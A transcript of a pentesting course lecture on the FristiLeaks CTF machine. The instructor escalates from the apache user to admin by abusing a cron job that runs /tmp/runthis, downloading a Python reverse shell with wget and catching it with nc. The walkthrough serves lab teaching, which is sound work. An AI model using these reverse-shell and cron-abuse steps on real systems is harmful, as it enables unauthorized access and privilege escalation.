The course is part of this learning path
In this course, we solve a vulnerable virtual machine called FristiLeaks in order to explore pentesting and privilege escalation techniques.
Hi. Within this lecture, we're going to see what we can do to escalate our privileges because we are currently in the server as user apache and we're going to see what we can do to make our way up. So, what I'm going to do, I'm going to of course cat the etc password to be starting.
And here we have the root of course. And let's see what we can see over here. We have the apache which is where we are currently in. And we have eezeepz and we have quite various users over here like we have eezeepz, we have admin, we have fristigod and we have fristi itself. So, I don't know, maybe we're going to see every one of those. Maybe we're going to just jump right into some of those and make our way up from there. So, I'm going to cat the etc issue to see if we get any kind of description over here. So, no, we just see the goal and the IP address over there. So, let's see what else we can get over here. So, I'm going to try to go into the users, and let me see where we are, we are in the root right now. If we run ls -la, we can see the current folders and files that are available to us. Let's see if we can go to root. I'm going to say cd root, of course, we cannot do that. Maybe we can go to some other user's folder, maybe we can find some kind of lead over there. So, I'm going to go to home and as you can see in the home we have admin, eezeepz, and fristigod. So, I'm going to go into admin. I cannot do that, I'm going to go into eezeepz and here we go, we can do that. And if we run ls we have a lot of files and folders over here apparently, We have MAKEDEV, let me run ls -la and see it in a better way. So, over here in the eezeepz, we have some kind of hidden files and folders over there and here. And we have I believe some kind of binaries as well like chmod, chown. Let's see, we have kill, nano and we have notes.txt which is good because we can read it I believe. I'm looking for permissions. I'm going to cat the notes.txt and here you go. It says Yo EZ, I made it possible for you to do some automated checks. I did only allow your access to usr/bin/* system binaries. So, we can run some binaries in the usr/bin folder which is good. I did however copy a few extra often needed commands to my home directory which is chmod, df, cat, echo, ps, grep and so many more, great. Don't forget to specify the full path for each binary. So, we can actually use those binaries in order to create a reverse shell I believe. And we have a big tip over here which says that just put a file called 'runthis' in the /tmp/, each line one command. So, we have to specify a one line over here to run those binaries as far as I understand. So, we can run some binaries as admin user but we have to create a file in order to do that. But we cannot cd into that folder so I believe we're going to have to see what kind of things we have over there by running ls -la or something like that. Let's see if we can cat the notes.txt using this. No, we cannot do that even though they copied these binaries into the admin folder, we cannot directly reach it, we cannot directly execute them. So, if we could have done that then it would make our way easier because we can run some binary commands, but there is a way to do that.
It says that just put a file called "runthis" in /tmp/ and each line should include one command. Then the output goes to the file "cronresult" in the /tmp/ and it should run every minute with my account privileges. So, there is a cron tab going on over here, cronjob. And in that cronjob, it runs "runthis" file every minute. And if we can specify a one line over there to run a binary in an unprivileged escalated privilege mode, then we can get a reverse shell back to us, then we can be admin user. I don't know if it will lead us to the root, but most probably it will and its administrator user, maybe we can actually go into the root by not doing so many things later on. So, I'm going to do exactly like instructed over here. First of all, I'm going to see what kind of binaries under the usr/bin to see if we can run Python for example. Let me see if we can run Python and here we you go, I lost the shell. Of course, in order to gain the shell, I'm going to run an nc -nvlp 1234 one more time and I'm going to have to go into the Firefox and run this PHP reverse shell one more time, and let's see if we can get this over here. So, 10.0.2.16 and uploads/shell.php.png. Here we go, I believe it works. Here we go, I have the shell one more time. So, great, I don't know if we have the Python or not. So, I'm going to run ls and I'm going to go into the home folder one more time and into the eezeepz. To see that note one more time, I'm going to run ls -la, here we go. I'm going to cat the notes.txt and here we are. So far, I try to see if we have Python over here and I fail to do that. So, we're going to have to take a different route over here. And first of all, I really need to see what kind of thing that I should put into the "runthis" file. So, I'm going to try and ls -la into this usr/bin and see what kind of things that we have over there. And we're going to try and if we can have a Python running over here, then we're going to try that. So, what I'm going to do, I'm going to ls -la into the usr/bin and see all the available binaries for me. So, write ls -la and usr/bin. Here we go, I believe we managed to see that and we have a lot of things going on over here. As you can see, we have a lot of binaries inside of our server and I think we should do grep because it will take some time to find it from here. So, I'm going to say ls -la /usr/bin and I'm going to pipe this into the grep and I'm going to grep the Python. And here we have the Python, I believe we only have Python 2, but it's okay, because we have the reverse shell codes for Python 2 in the pentestmonkey, we can take leverage of that. And if we can make this work, then I can just create a "runthis" file and say use the python and just execute this file, for example. So, I'm going to go for the pentestmonkey one more time and I'm going to search for python reverse shell cheat sheet like we have done before. I'm going to open the pentestmonkey. And if you cannot go into the pentestmonkey, by the way, you can just use what I'm using. You can just type the Python commands. I believe you right now you see how this works. So, let's open a new tab and do this in the local and we can just do this under the Fristileaks folder. I'm going to open a nano pythonshell.py over here. So, I'm going to paste this thing in and since this is a one line here, we can just put this into "runthis" folder as well, but it won't know how to run the python from the user binary. So, what I'm going to do, I'm just going to turn this into a regular Python code as we have done before, I'm going to import the library socket, subprocess and the operating system libraries over here. So, I'm going to define the socket as s. So, this is how the socket works as you might remember and over here, I'm just going to give my own IP address and we need to change the port here as well because we have used the 1234. I'm going to make it 5555, but you can just use any port that you want that is not in currently use. So, I'm coming over here to delete the semicolons because we don't need them in a regular Python code and here we go. So, it will give us some sh shell and I'm going to delete those things as well. So, here we go, our Python code is ready if you want, you can just pause this video and write it on your own. Make sure you write exactly like what you have seen over there. So, let me cat this and here we go. So, I'm going to take this and put it into my web server over here. In my user var/www/html folder. So, var/www/html. So, this copy that thing. So, I'm going to run my apache server like we have done before.
So I have a pythonshell.py in my apache server. So, what I'm going to do, I'm going to just use wget over here and as you can see we have the wget. So, I'm going to go under cd /tmp because that's where we should actually execute this. As you can see in the /tmp/, we don't have anything right now, but we're going to have soon if I run this correct. So, we get http: //10.0.2.4 for me and write your own IP address over here in order to test this and just write the thing that you have just copied and here we go. I managed to download the python shell in my server. So, I'm going to run this cat and here we go, we have the python shell. So, rather than trying to run this python shell over here, we can actually run this python shell right now but it will give us the shell, but it will give us the shell as the current user that we are in as in I believe we are in the Apache user. In order to get this in a privileged way, in an escalated privileged way, we need to make this run with the cronjob it was talking about so that it can run as admin user. So, what we're going to do, we're going to do as instructed before. We're going to have to create a "runthis" file and in that "runthis" file, we have to specify something. So, in order to do that, I'm going to just run echo and say usr/bin/python. So, it's going to use the python over here under the user bin folder, and it's going to execute the /tmp/ pythonshell.py and don't forget to place a space between them. And I'm going to output this into a file called runthis and since we are currently in the /tmp/ folder, we can just execute this over here. I'm going to run this and It will be run within one minute, I believe. As you can see if you run ls -la, we can see this. If you run on cat runthis, it will just run this command and it also complies with the one line rule as well. So, I'm going to say nc -nvlp 5555 over here and within one minute it should get executed. Let me run ls -la one more time. As you can see this will create something called, I believe, resultcron or something like that and once we see that it will mean that it gets executed in a regular way. Let's see how this thing was called, let me come over here to top and see if we can get the note back and it will pass some time as well. Here we go, it will just create a file called cronresult in the /tmp. So, if you see the cronresult, it means that it got executed. So, this is not a rule in a regular server, this is the rule that our CTF made it possible. So, if I run ls -la, here we go, we see the cronresult. Let me go back and here we go. We have the sh shell, so if we run whoami, we are admin right now. So, we managed to become admin but I believe we are not currently root, so we cannot go and be root directly. So, let me cat the etc password over here. We can see the root, we can see the admin, but there are some couple of other users here as well. So, we might take a look at those ones as well in the upcoming lecture.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.